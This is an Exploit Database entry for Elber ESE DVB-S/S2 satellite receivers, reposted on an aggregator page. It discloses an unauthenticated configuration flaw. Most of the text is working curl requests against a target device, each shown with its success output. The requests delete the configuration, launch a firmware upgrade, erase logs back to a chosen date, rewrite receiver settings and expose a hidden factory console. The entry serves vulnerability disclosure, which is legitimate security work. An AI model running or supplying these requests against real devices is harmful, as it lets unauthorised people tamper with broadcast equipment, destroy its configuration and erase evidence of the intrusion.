Elber ESE DVB-S/S2 Satellite Receiver 1.5.x – Device Config

• Exploit Database
• 31 阅读

• 作者： LiquidWorm
  日期： 2024-08-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/52070/

• Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config
  
  
  Vendor: Elber S.r.l.
  Product web page: https://www.elber.it
  Affected version: 1.5.179 Revision 904
  1.5.56 Revision 884
  1.229 Revision 440
  
  Summary: ESE (Elber Satellite Equipment) product line, designed for the
  high-end radio contribution and distribution market, where quality and
  reliability are most important. The Elber IRD (Integrated Receiver Decoder)
  ESE-01 offers a professional audio quality (and composite video) at an
  excellent quality/price ratio. The development of digital satellite contribution
  networks and the need to connect a large number of sites require a cheap
  but reliable and performing satellite receiver with integrated decoder.
  
  Desc: The device suffers from an unauthenticated device configuration and
  client-side hidden functionality disclosure.
  
  Tested on: NBFM Controller
   embOS/IP
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2024-5821
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php
  
  
  18.08.2023
  
  --
  
  
  # Config fan
  $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
  Configuration applied
  
  # Delete config
  $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
  File delete successfully
  
  # Launch upgrade
  $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
  Upgrade launched Successfully
  
  # Log erase
  $ curl 'http://TARGET/json_data/erase_log.js?until=-2'
  Logs erased
  
  # Until:
  # =0 ALL
  # =-2 Yesterday
  # =-8 Last week
  # =-15 Last two weeks
  # =-22 Last three weeks
  # =-31 Last month
  
  # Set RX config
  $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
  RX Config Applied Successfully
  
  # Show factory window and FPGA upload (Console)
  > cleber_show_factory_wnd()
  
  # Etc.